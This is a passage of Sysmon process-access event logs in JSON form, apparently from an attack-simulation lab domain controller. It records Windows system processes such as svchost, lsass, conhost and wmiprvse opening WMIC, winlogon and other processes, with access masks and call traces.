C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5786,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.487\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.487","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
